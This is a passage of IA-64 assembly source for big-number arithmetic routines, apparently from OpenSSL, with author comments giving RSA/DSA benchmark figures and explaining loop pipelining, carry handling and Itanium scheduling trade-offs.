// rsa 512 bits 0.0036s 0.0003s 275.3 2999.2
// rsa 1024 bits 0.0203s 0.0011s 49.3 894.1
// rsa 2048 bits 0.1331s 0.0040s 7.5 250.9
// rsa 4096 bits 0.9270s 0.0147s 1.1 68.1
// sign verify sign/s verify/s
// dsa 512 bits 0.0035s 0.0043s 288.3 234.8
// dsa 1024 bits 0.0111s 0.0135s 90.0 74.2
//
// And here is similar output but for this assembler
// implementation:-)
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0021s 0.0001s 549.4 9638.5
// rsa 1024 bits 0.0055s 0.0002s 183.8 4481.1
// rsa 2048 bits 0.0244s 0.0006s 41.4 1726.3
// rsa 4096 bits 0.1295s 0.0018s 7.7 561.5
// sign verify sign/s verify/s
// dsa 512 bits 0.0012s 0.0013s 891.9 756.6
// dsa 1024 bits 0.0023s 0.0028s 440.4 376.2
//
// Yes, you may argue that it's not fair comparison as it's
// possible to craft the C implementation with BN_UMULT_HIGH
// inline assembler macro. But of course! Here is the output
// with the macro:
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0020s 0.0002s 495.0 6561.0
// rsa 1024 bits 0.0086s 0.0004s 116.2 2235.7
// rsa 2048 bits 0.0519s 0.0015s 19.3 667.3
// rsa 4096 bits 0.3464s 0.0053s 2.9 187.7
// sign verify sign/s verify/s
// dsa 512 bits 0.0016s 0.0020s 613.1 510.5
// dsa 1024 bits 0.0045s 0.0054s 221.0 183.9
//
// My code is still way faster, huh:-) And I believe that even
// higher performance can be achieved. Note that as keys get
// longer, performance gain is larger. Why? According to the
// profiler there is another player in the field, namely
// BN_from_montgomery consuming larger and larger portion of CPU
// time as keysize decreases. I therefore consider putting effort
// to assembler implementation of the following routine:
//
// void bn_mul_add_mont (BN_ULONG *rp,BN_ULONG *np,int nl,BN_ULONG n0)
// {
// int i,j;
// BN_ULONG v;
//
// for (i=0; i<nl; i++)
// {
// v=bn_mul_add_words(rp,np,nl,(rp[0]*n0)&BN_MASK2);
// nrp++;
// rp++;
// if (((nrp[-1]+=v)&BN_MASK2) < v)
// for (j=0; ((++nrp[j])&BN_MASK2) == 0; j++) ;
// }
// }
//
// It might as well be beneficial to implement even combaX
// variants, as it appears as it can literally unleash the
// performance (see comment section to bn_mul_comba8 below).
//
// And finally for your reference the output for 0.9.6a compiled
// with SGIcc version 0.01.0-12 (keep in mind that for the moment
// of this writing it's not possible to convince SGIcc to use
// BN_UMULT_HIGH inline assembler macro, yet the code is fast,
// i.e. for a compiler generated one:-):
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0022s 0.0002s 452.7 5894.3
// rsa 1024 bits 0.0097s 0.0005s 102.7 2002.9
// rsa 2048 bits 0.0578s 0.0017s 17.3 600.2
// rsa 4096 bits 0.3838s 0.0061s 2.6 164.5
// sign verify sign/s verify/s
// dsa 512 bits 0.0018s 0.0022s 547.3 459.6
// dsa 1024 bits 0.0051s 0.0062s 196.6 161.3
//
// Oh! Benchmarks were performed on 733MHz Lion-class Itanium
// system running Redhat Linux 7.1 (very special thanks to Ray
// McCaffity of Williams Communications for providing an account).
//
// Q. What's the heck with 'rum 1<<5' at the end of every function?
// A. Well, by clearing the "upper FP registers written" bit of the
// User Mask I want to excuse the kernel from preserving upper
// (f32-f128) FP register bank over process context switch, thus
// minimizing bus bandwidth consumption during the switch (i.e.
// after PKI opration completes and the program is off doing
// something else like bulk symmetric encryption). Having said
// this, I also want to point out that it might be good idea
// to compile the whole toolkit (as well as majority of the
// programs for that matter) with -mfixed-range=f32-f127 command
// line option. No, it doesn't prevent the compiler from writing
// to upper bank, but at least discourages to do so. If you don't
// like the idea you have the option to compile the module with
// -Drum=nop.m in command line.
//
#if defined(_HPUX_SOURCE) && !defined(_LP64)
#define ADDP addp4
#else
#define ADDP add
#endif
#if 1
//
// bn_[add|sub]_words routines.
//
// Loops are spinning in 2*(n+5) ticks on Itanuim (provided that the
// data reside in L1 cache, i.e. 2 ticks away). It's possible to
// compress the epilogue and get down to 2*n+6, but at the cost of
// scalability (the neat feature of this implementation is that it
// shall automagically spin in n+5 on "wider" IA-64 implementations:-)
// I consider that the epilogue is short enough as it is to trade tiny
// performance loss on Itanium for scalability.
//
// BN_ULONG bn_add_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
//
.global bn_add_words#
.proc bn_add_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_add_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
cmp4.le p6,p0=r35,r0 };;
{ .mfb; mov r8=r0 // return value
(p6) br.ret.spnt.many b0 };;
{ .mib; sub r10=r35,r0,1
.save ar.lc,r3
mov r3=ar.lc
brp.loop.imp .L_bn_add_words_ctop,.L_bn_add_words_cend-16
}
{ .mib; ADDP r14=0,r32 // rp
.save pr,r9
mov r9=pr };;
.body
{ .mii; ADDP r15=0,r33 // ap
mov ar.lc=r10
mov ar.ec=6 }
{ .mib; ADDP r16=0,r34 // bp
mov pr.rot=1<<16 };;
.L_bn_add_words_ctop:
{ .mii; (p16) ld8 r32=[r16],8 // b=*(bp++)
(p18) add r39=r37,r34
(p19) cmp.ltu.unc p56,p0=r40,r38 }
{ .mfb; (p0) nop.m 0x0
(p0) nop.f 0x0
(p0) nop.b 0x0 }
{ .mii; (p16) ld8 r35=[r15],8 // a=*(ap++)
(p58) cmp.eq.or p57,p0=-1,r41 // (p20)
(p58) add r41=1,r41 } // (p20)
{ .mfb; (p21) st8 [r14]=r42,8 // *(rp++)=r
(p0) nop.f 0x0
br.ctop.sptk .L_bn_add_words_ctop };;
.L_bn_add_words_cend:
{ .mii;
(p59) add r8=1,r8 // return value
mov pr=r9,0x1ffff
mov ar.lc=r3 }
{ .mbb; nop.b 0x0
br.ret.sptk.many b0 };;
.endp bn_add_words#
//
// BN_ULONG bn_sub_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
//
.global bn_sub_words#
.proc bn_sub_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_sub_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
cmp4.le p6,p0=r35,r0 };;
{ .mfb; mov r8=r0 // return value
(p6) br.ret.spnt.many b0 };;
{ .mib; sub r10=r35,r0,1
.save ar.lc,r3
mov r3=ar.lc
brp.loop.imp .L_bn_sub_words_ctop,.L_bn_sub_words_cend-16
}
{ .mib; ADDP r14=0,r32 // rp
.save pr,r9
mov r9=pr };;
.body
{ .mii; ADDP r15=0,r33 // ap
mov ar.lc=r10
mov ar.ec=6 }
{ .mib; ADDP r16=0,r34 // bp
mov pr.rot=1<<16 };;
.L_bn_sub_words_ctop:
{ .mii; (p16) ld8 r32=[r16],8 // b=*(bp++)
(p18) sub r39=r37,r34
(p19) cmp.gtu.unc p56,p0=r40,r38 }
{ .mfb; (p0) nop.m 0x0
(p0) nop.f 0x0
(p0) nop.b 0x0 }
{ .mii; (p16) ld8 r35=[r15],8 // a=*(ap++)
(p58) cmp.eq.or p57,p0=0,r41 // (p20)
(p58) add r41=-1,r41 } // (p20)
{ .mbb; (p21) st8 [r14]=r42,8 // *(rp++)=r
(p0) nop.b 0x0
br.ctop.sptk .L_bn_sub_words_ctop };;
.L_bn_sub_words_cend:
{ .mii;
(p59) add r8=1,r8 // return value
mov pr=r9,0x1ffff
mov ar.lc=r3 }
{ .mbb; nop.b 0x0
br.ret.sptk.many b0 };;
.endp bn_sub_words#
#endif
#if 0
#define XMA_TEMPTATION
#endif
#if 1
//
// BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
//
.global bn_mul_words#
.proc bn_mul_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_mul_words:
.prologue
.save ar.pfs,r2
#ifdef XMA_TEMPTATION
{ .mfi; alloc r2=ar.pfs,4,0,0,0 };;
#else
{ .mfi; alloc r2=ar.pfs,4,12,0,16 };;
#endif
{ .mib; mov r8=r0 // return value
cmp4.le p6,p0=r34,r0
(p6) br.ret.spnt.many b0 };;
{ .mii; sub r10=r34,r0,1
.save ar.lc,r3
mov r3=ar.lc
.save pr,r9
mov r9=pr };;
.body
{ .mib; setf.sig f8=r35 // w
mov pr.rot=0x800001<<16
// ------^----- serves as (p50) at first (p27)
brp.loop.imp .L_bn_mul_words_ctop,.L_bn_mul_words_cend-16
}
#ifndef XMA_TEMPTATION
{ .mmi; ADDP r14=0,r32 // rp
ADDP r15=0,r33 // ap
mov ar.lc=r10 }
{ .mmi; mov r40=0 // serves as r35 at first (p27)
mov ar.ec=13 };;
// This loop spins in 2*(n+12) ticks. It's scheduled for data in Itanium
// L2 cache (i.e. 9 ticks away) as floating point load/store instructions
// bypass L1 cache and L2 latency is actually best-case scenario for
// ldf8. The loop is not scalable and shall run in 2*(n+12) even on
// "wider" IA-64 implementations. It's a trade-off here. n+24 loop
// would give us ~5% in *overall* performance improvement on "wider"
// IA-64, but would hurt Itanium for about same because of longer
// epilogue. As it's a matter of few percents in either case I've
// chosen to trade the scalability for development time (you can see
// this very instruction sequence in bn_mul_add_words loop which in
// turn is scalable).
.L_bn_mul_words_ctop:
{ .mfi; (p25) getf.sig r36=f52 // low
(p21) xmpy.lu f48=f37,f8
(p28) cmp.ltu p54,p50=r41,r39 }
{ .mfi; (p16) ldf8 f32=[r15],8
(p21) xmpy.hu f40=f37,f8
(p0) nop.i 0x0 };;
{ .mii; (p25) getf.sig r32=f44 // high
.pred.rel "mutex",p50,p54
(p50) add r40=r38,r35 // (p27)
(p54) add r40=r38,r35,1 } // (p27)
{ .mfb; (p28) st8 [r14]=r41,8
(p0) nop.f 0x0
br.ctop.sptk .L_bn_mul_words_ctop };;
.L_bn_mul_words_cend:
{ .mii; nop.m 0x0
.pred.rel "mutex",p51,p55
(p51) add r8=r36,r0
(p55) add r8=r36,r0,1 }
{ .mfb; nop.m 0x0
nop.f 0x0
nop.b 0x0 }
#else // XMA_TEMPTATION
setf.sig f37=r0 // serves as carry at (p18) tick
mov ar.lc=r10
mov ar.ec=5;;
// Most of you examining this code very likely wonder why in the name
// of Intel the following loop is commented out? Indeed, it looks so
// neat that you find it hard to believe that it's something wrong
// with it, right? The catch is that every iteration depends on the
// result from previous one and the latter isn't available instantly.
// The loop therefore spins at the latency of xma minus 1, or in other
// words at 6*(n+4) ticks:-( Compare to the "production" loop above
// that runs in 2*(n+11) where the low latency problem is worked around
// by moving the dependency to one-tick latent interger ALU. Note that
// "distance" between ldf8 and xma is not latency of ldf8, but the
// *difference* between xma and ldf8 latencies.
.L_bn_mul_words_ctop:
{ .mfi; (p16) ldf8 f32=[r33],8
(p18) xma.hu f38=f34,f8,f39 }
{ .mfb; (p20) stf8 [r32]=f37,8
(p18) xma.lu f35=f34,f8,f39
br.ctop.sptk .L_bn_mul_words_ctop };;
.L_bn_mul_words_cend:
getf.sig r8=f41 // the return value
#endif // XMA_TEMPTATION
{ .mii; nop.m 0x0
mov pr=r9,0x1ffff
mov ar.lc=r3 }
{ .mfb; rum 1<<5 // clear um.mfh
nop.f 0x0
br.ret.sptk.many b0 };;
.endp bn_mul_words#
#endif
#if 1
//
// BN_ULONG bn_mul_add_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
//
.global bn_mul_add_words#
.proc bn_mul_add_words#
.align 64
.skip 48 // makes the loop body aligned at 64-byte boundary
bn_mul_add_words:
.prologue
.save ar.pfs,r2
{ .mmi; alloc r2=ar.pfs,4,4,0,8
cmp4.le p6,p0=r34,r0
.save ar.lc,r3
mov r3=ar.lc };;
{ .mib; mov r8=r0 // return value
sub r10=r34,r0,1
(p6) br.ret.spnt.many b0 };;
{ .mib; setf.sig f8=r35 // w
.save pr,r9
mov r9=pr
brp.loop.imp .L_bn_mul_add_words_ctop,.L_bn_mul_add_words_cend-16
}
.body
{ .mmi; ADDP r14=0,r32 // rp
ADDP r15=0,r33 // ap
mov ar.lc=r10 }
{ .mii; ADDP r16=0,r32 // rp copy
mov pr.rot=0x2001<<16
// ------^----- serves as (p40) at first (p27)
mov ar.ec=11 };;
// This loop spins in 3*(n+10) ticks on Itanium and in 2*(n+10) on
// Itanium 2. Yes, unlike previous versions it scales:-) Previous
// version was peforming *all* additions in IALU and was starving
// for those even on Itanium 2. In this version one addition is
// moved to FPU and is folded with multiplication. This is at cost
// of propogating the result from previous call to this subroutine
// to L2 cache... In other words negligible even for shorter keys.
// *Overall* performance improvement [over previous version] varies
// from 11 to 22 percent depending on key length.
.L_bn_mul_add_words_ctop:
.pred.rel "mutex",p40,p42
{ .mfi; (p23) getf.sig r36=f45 // low
(p20) xma.lu f42=f36,f8,f50 // low
(p40) add r39=r39,r35 } // (p27)
{ .mfi; (p16) ldf8 f32=[r15],8 // *(ap++)
(p20) xma.hu f36=f36,f8,f50 // high
(p42) add r39=r39,r35,1 };; // (p27)
{ .mmi; (p24) getf.sig r32=f40 // high
(p16) ldf8 f46=[r16],8 // *(rp1++)
(p40) cmp.ltu p41,p39=r39,r35 } // (p27)
{ .mib; (p26) st8 [r14]=r39,8 // *(rp2++)
(p42) cmp.leu p41,p39=r39,r35 // (p27)
br.ctop.sptk .L_bn_mul_add_words_ctop};;
.L_bn_mul_add_words_cend:
{ .mmi; .pred.rel "mutex",p40,p42
(p40) add r8=r35,r0
(p42) add r8=r35,r0,1
mov pr=r9,0x1ffff }
{ .mib; rum 1<<5 // clear um.mfh
mov ar.lc=r3
br.ret.sptk.many b0 };;
.endp bn_mul_add_words#
#endif
#if 1
//
// void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
//
.global bn_sqr_words#
.proc bn_sqr_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_sqr_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,3,0,0,0
sxt4 r34=r34 };;
{ .mii; cmp.le p6,p0=r34,r0
mov r8=r0 } // return value
{ .mfb; ADDP r32=0,r32
nop.f 0x0
(p6) br.ret.spnt.many b0 };;
{ .mii; sub r10=r34,r0,1
.save ar.lc,r3
mov r3=ar.lc
.save pr,r9
mov r9=pr };;
.body
{ .mib; ADDP r33=0,r33
mov pr.rot=1<<16
brp.loop.imp .L_bn_sqr_words_ctop,.L_bn_sqr_words_cend-16
}
{ .mii; add r34=8,r32
mov ar.lc=r10
mov ar.ec=18 };;
// 2*(n+17) on Itanium, (n+17) on "wider" IA-64 implementations. It's
// possible to compress the epilogue (I'm getting tired to write this
// comment over and over) and get down to 2*n+16 at the cost of
// scalability. The decision will very likely be reconsidered after the
// benchmark program is profiled. I.e. if perfomance gain on Itanium
// will appear larger than loss on "wider" IA-64, then the loop should
// be explicitely split and the epilogue compressed.
.L_bn_sqr_words_ctop:
{ .mfi; (p16) ldf8 f32=[r33],8
(p25) xmpy.lu f42=f41,f41
(p0) nop.i 0x0 }
{ .mib; (p33) stf8 [r32]=f50,16
(p0) nop.i 0x0
(p0) nop.b 0x0 }
{ .mfi; (p0) nop.m 0x0
(p25) xmpy.hu f52=f41,f41
(p0) nop.i 0x0 }
{ .mib; (p33) stf8 [r34]=f60,16
(p0) nop.i 0x0
br.ctop.sptk .L_bn_sqr_words_ctop };;
.L_bn_sqr_words_cend:
{ .mii; nop.m 0x0
mov pr=r9,0x1ffff
mov ar.lc=r3 }
{ .mfb; rum 1<<5 // clear um.mfh
nop.f 0x0
br.ret.sptk.many b0 };;
.endp bn_sqr_words#
#endif
#if 1
// Apparently we win nothing by implementing special bn_sqr_comba8.
// Yes, it is possible to reduce the number of multiplications by
// almost factor of two, but then the amount of additions would
// increase by factor of two (as we would have to perform those
// otherwise performed by xma ourselves). Normally we would trade
// anyway as multiplications are way more expensive, but not this
// time... Multiplication kernel is fully pipelined and as we drain
// one 128-bit multiplication result per clock cycle multiplications
// are effectively as inexpensive as additions. Special implementation
// might become of interest for "wider" IA-64 implementation as you'll
// be able to get through the multiplication phase faster (there won't
// be any stall issues as discussed in the commentary section below and
// you therefore will be able to employ all 4 FP units)... But these
// Itanium days it's simply too hard to justify the effort so I just
// drop down to bn_mul_comba8 code:-)
//
// void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
//
.global bn_sqr_comba8#
.proc bn_sqr_comba8#
.align 64
bn_sqr_comba8:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,2,1,0,0
addp4 r33=0,r33
addp4 r32=0,r32 };;
{ .mii;
#else
{ .mii; alloc r2=ar.pfs,2,1,0,0
#endif
mov r34=r33
add r14=8,r33 };;
.body
{ .mii; add r17=8,r34
add r15=16,r33
add r18=16,r34 }
{ .mfb; add r16=24,r33
br .L_cheat_entry_point8 };;
.endp bn_sqr_comba8#
#endif
#if 1
// I've estimated this routine to run in ~120 ticks, but in reality
// (i.e. according to ar.itc) it takes ~160 ticks. Are those extra
// cycles consumed for instructions fetch? Or did I misinterpret some
// clause in Itanium -architecture manual? Comments are welcomed and
// highly appreciated.
//
// On Itanium 2 it takes ~190 ticks. This is because of stalls on
// result from getf.sig. I do nothing about it at this point for
// reasons depicted below.
//
// However! It should be noted that even 160 ticks is darn good result
// as it's over 10 (yes, ten, spelled as t-e-n) times faster than the
// C version (compiled with gcc with inline assembler). I really
// kicked compiler's butt here, didn't I? Yeah! This brings us to the
// following statement. It's damn shame that this routine isn't called
// very often nowadays! According to the profiler most CPU time is
// consumed by bn_mul_add_words called from BN_from_montgomery. In
// order to estimate what we're missing, I've compared the performance
// of this routine against "traditional" implementation, i.e. against
// following routine:
//
// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
// { r[ 8]=bn_mul_words( &(r[0]),a,8,b[0]);
// r[ 9]=bn_mul_add_words(&(r[1]),a,8,b[1]);
// r[10]=bn_mul_add_words(&(r[2]),a,8,b[2]);
// r[11]=bn_mul_add_words(&(r[3]),a,8,b[3]);
// r[12]=bn_mul_add_words(&(r[4]),a,8,b[4]);
// r[13]=bn_mul_add_words(&(r[5]),a,8,b[5]);
// r[14]=bn_mul_add_words(&(r[6]),a,8,b[6]);
// r[15]=bn_mul_add_words(&(r[7]),a,8,b[7]);
// }
//
// The one below is over 8 times faster than the one above:-( Even
// more reasons to "combafy" bn_mul_add_mont...
//
// And yes, this routine really made me wish there were an optimizing
// assembler! It also feels like it deserves a dedication.
//
// To my wife for being there and to my kids...
//
// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
//
#define carry1 r14
#define carry2 r15
#define carry3 r34
.global bn_mul_comba8#
.proc bn_mul_comba8#
.align 64
bn_mul_comba8:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,3,0,0,0
addp4 r33=0,r33
addp4 r34=0,r34 };;
{ .mii; addp4 r32=0,r32
#else
{ .mii; alloc r2=ar.pfs,3,0,0,0
#endif
add r14=8,r33
add r17=8,r34 }
.body
{ .mii; add r15=16,r33
add r18=16,r34
add r16=24,r33 }
.L_cheat_entry_point8:
{ .mmi; add r19=24,r34
ldf8 f32=[r33],32 };;
{ .mmi; ldf8 f120=[r34],32
ldf8 f121=[r17],32 }
{ .mmi; ldf8 f122=[r18],32
ldf8 f123=[r19],32 };;
{ .mmi; ldf8 f124=[r34]
ldf8 f125=[r17] }
{ .mmi; ldf8 f126=[r18]
ldf8 f127=[r19] }
{ .mmi; ldf8 f33=[r14],32
ldf8 f34=[r15],32 }
{ .mmi; ldf8 f35=[r16],32;;
ldf8 f36=[r33] }
{ .mmi; ldf8 f37=[r14]
ldf8 f38=[r15] }
{ .mfi; ldf8 f39=[r16]
// -------\ Entering multiplier's heaven /-------
// ------------\ /------------
// -----------------\ /-----------------
// ----------------------\/----------------------
xma.hu f41=f32,f120,f0 }
{ .mfi; xma.lu f40=f32,f120,f0 };; // (*)
{ .mfi; xma.hu f51=f32,f121,f0 }
{ .mfi; xma.lu f50=f32,f121,f0 };;
{ .mfi; xma.hu f61=f32,f122,f0 }
{ .mfi; xma.lu f60=f32,f122,f0 };;
{ .mfi; xma.hu f71=f32,f123,f0 }
{ .mfi; xma.lu f70=f32,f123,f0 };;
{ .mfi; xma.hu f81=f32,f124,f0 }
{ .mfi; xma.lu f80=f32,f124,f0 };;
{ .mfi; xma.hu f91=f32,f125,f0 }
{ .mfi; xma.lu f90=f32,f125,f0 };;
{ .mfi; xma.hu f101=f32,f126,f0 }
{ .mfi; xma.lu f100=f32,f126,f0 };;
{ .mfi; xma.hu f111=f32,f127,f0 }
{ .mfi; xma.lu f110=f32,f127,f0 };;//
// (*) You can argue that splitting at every second bundle would
// prevent "wider" IA-64 implementations from achieving the peak
// performance. Well, not really... The catch is that if you
// intend to keep 4 FP units busy by splitting at every fourth
// bundle and thus perform these 16 multiplications in 4 ticks,
// the first bundle *below* would stall because the result from
// the first xma bundle *above* won't be available for another 3
// ticks (if not more, being an optimist, I assume that "wider"
// implementation will have same latency:-). This stall will hold
// you back and the performance would be as if every second bundle
// were split *anyway*...
{ .mfi; getf.sig r16=f40
xma.hu f42=f33,f120,f41
add r33=8,r32 }
{ .mfi; xma.lu f41=f33,f120,f41 };;
{ .mfi; getf.sig r24=f50
xma.hu f52=f33,f121,f51 }
{ .mfi; xma.lu f51=f33,f121,f51 };;
{ .mfi; st8 [r32]=r16,16
xma.hu f62=f33,f122,f61 }
{ .mfi; xma.lu f61=f33,f122,f61 };;
{ .mfi; xma.hu f72=f33,f123,f71 }
{ .mfi; xma.lu f71=f33,f123,f71 };;
{ .mfi; xma.hu f82=f33,f124,f81 }
{ .mfi; xma.lu f81=f33,f124,f81 };;
{ .mfi; xma.hu f92=f33,f125,f91 }
{ .mfi; xma.lu f91=f33,f125,f91 };;
{ .mfi; xma.hu f102=f33,f126,f101 }
{ .mfi; xma.lu f101=f33,f126,f101 };;
{ .mfi; xma.hu f112=f33,f127,f111 }
{ .mfi; xma.lu f111=f33,f127,f111 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r25=f41
xma.hu f43=f34,f120,f42 }
{ .mfi; xma.lu f42=f34,f120,f42 };;
{ .mfi; getf.sig r16=f60
xma.hu f53=f34,f121,f52 }
{ .mfi; xma.lu f52=f34,f121,f52 };;
{ .mfi; getf.sig r17=f51
xma.hu f63=f34,f122,f62
add r25=r25,r24 }
{ .mfi; xma.lu f62=f34,f122,f62
mov carry1=0 };;
{ .mfi; cmp.ltu p6,p0=r25,r24
xma.hu f73=f34,f123,f72 }
{ .mfi; xma.lu f72=f34,f123,f72 };;
{ .mfi; st8 [r33]=r25,16
xma.hu f83=f34,f124,f82
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f82=f34,f124,f82 };;
{ .mfi; xma.hu f93=f34,f125,f92 }
{ .mfi; xma.lu f92=f34,f125,f92 };;
{ .mfi; xma.hu f103=f34,f126,f102 }
{ .mfi; xma.lu f102=f34,f126,f102 };;
{ .mfi; xma.hu f113=f34,f127,f112 }
{ .mfi; xma.lu f112=f34,f127,f112 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r18=f42
xma.hu f44=f35,f120,f43
add r17=r17,r16 }
{ .mfi; xma.lu f43=f35,f120,f43 };;
{ .mfi; getf.sig r24=f70
xma.hu f54=f35,f121,f53 }
{ .mfi; mov carry2=0
xma.lu f53=f35,f121,f53 };;
{ .mfi; getf.sig r25=f61
xma.hu f64=f35,f122,f63
cmp.ltu p7,p0=r17,r16 }
{ .mfi; add r18=r18,r17
xma.lu f63=f35,f122,f63 };;
{ .mfi; getf.sig r26=f52
xma.hu f74=f35,f123,f73
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f73=f35,f123,f73
add r18=r18,carry1 };;
{ .mfi;
xma.hu f84=f35,f124,f83
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,carry1
xma.lu f83=f35,f124,f83 };;
{ .mfi; st8 [r32]=r18,16
xma.hu f94=f35,f125,f93
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f93=f35,f125,f93 };;
{ .mfi; xma.hu f104=f35,f126,f103 }
{ .mfi; xma.lu f103=f35,f126,f103 };;
{ .mfi; xma.hu f114=f35,f127,f113 }
{ .mfi; mov carry1=0
xma.lu f113=f35,f127,f113
add r25=r25,r24 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r27=f43
xma.hu f45=f36,f120,f44
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f44=f36,f120,f44
add r26=r26,r25 };;
{ .mfi; getf.sig r16=f80
xma.hu f55=f36,f121,f54
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f54=f36,f121,f54 };;
{ .mfi; getf.sig r17=f71
xma.hu f65=f36,f122,f64
cmp.ltu p6,p0=r26,r25 }
{ .mfi; xma.lu f64=f36,f122,f64
add r27=r27,r26 };;
{ .mfi; getf.sig r18=f62
xma.hu f75=f36,f123,f74
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r27,r26
xma.lu f74=f36,f123,f74
add r27=r27,carry2 };;
{ .mfi; getf.sig r19=f53
xma.hu f85=f36,f124,f84
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f84=f36,f124,f84
cmp.ltu p6,p0=r27,carry2 };;
{ .mfi; st8 [r33]=r27,16
xma.hu f95=f36,f125,f94
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f94=f36,f125,f94 };;
{ .mfi; xma.hu f105=f36,f126,f104 }
{ .mfi; mov carry2=0
xma.lu f104=f36,f126,f104
add r17=r17,r16 };;
{ .mfi; xma.hu f115=f36,f127,f114
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f114=f36,f127,f114
add r18=r18,r17 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r20=f44
xma.hu f46=f37,f120,f45
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f45=f37,f120,f45
add r19=r19,r18 };;
{ .mfi; getf.sig r24=f90
xma.hu f56=f37,f121,f55 }
{ .mfi; xma.lu f55=f37,f121,f55 };;
{ .mfi; getf.sig r25=f81
xma.hu f66=f37,f122,f65
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r19,r18
xma.lu f65=f37,f122,f65
add r20=r20,r19 };;
{ .mfi; getf.sig r26=f72
xma.hu f76=f37,f123,f75
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r20,r19
xma.lu f75=f37,f123,f75
add r20=r20,carry1 };;
{ .mfi; getf.sig r27=f63
xma.hu f86=f37,f124,f85
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f85=f37,f124,f85
cmp.ltu p7,p0=r20,carry1 };;
{ .mfi; getf.sig r28=f54
xma.hu f96=f37,f125,f95
(p7) add carry2=1,carry2 }
{ .mfi; st8 [r32]=r20,16
xma.lu f95=f37,f125,f95 };;
{ .mfi; xma.hu f106=f37,f126,f105 }
{ .mfi; mov carry1=0
xma.lu f105=f37,f126,f105
add r25=r25,r24 };;
{ .mfi; xma.hu f116=f37,f127,f115
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f115=f37,f127,f115
add r26=r26,r25 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r29=f45
xma.hu f47=f38,f120,f46
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r26,r25
xma.lu f46=f38,f120,f46
add r27=r27,r26 };;
{ .mfi; getf.sig r16=f100
xma.hu f57=f38,f121,f56
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r27,r26
xma.lu f56=f38,f121,f56
add r28=r28,r27 };;
{ .mfi; getf.sig r17=f91
xma.hu f67=f38,f122,f66
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r28,r27
xma.lu f66=f38,f122,f66
add r29=r29,r28 };;
{ .mfi; getf.sig r18=f82
xma.hu f77=f38,f123,f76
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r29,r28
xma.lu f76=f38,f123,f76
add r29=r29,carry2 };;
{ .mfi; getf.sig r19=f73
xma.hu f87=f38,f124,f86
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f86=f38,f124,f86
cmp.ltu p6,p0=r29,carry2 };;
{ .mfi; getf.sig r20=f64
xma.hu f97=f38,f125,f96
(p6) add carry1=1,carry1 }
{ .mfi; st8 [r33]=r29,16
xma.lu f96=f38,f125,f96 };;
{ .mfi; getf.sig r21=f55
xma.hu f107=f38,f126,f106 }
{ .mfi; mov carry2=0
xma.lu f106=f38,f126,f106
add r17=r17,r16 };;
{ .mfi; xma.hu f117=f38,f127,f116
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f116=f38,f127,f116
add r18=r18,r17 };;//
//-------------------------------------------------//
{ .mfi; getf.sig r22=f46
xma.hu f48=f39,f120,f47
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f47=f39,f120,f47
add r19=r19,r18 };;
{ .mfi; getf.sig r24=f110
xma.hu f58=f39,f121,f57
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r19,r18
xma.lu f57=f39,f121,f57
add r20=r20,r19 };;
{ .mfi; getf.sig r25=f101
xma.hu f68=f39,f122,f67
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r20,r19
xma.lu f67=f39,f122,f67
add r21=r21,r20 };;
{ .mfi; getf.sig r26=f92
xma.hu f78=f39,f123,f77
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r21,r20
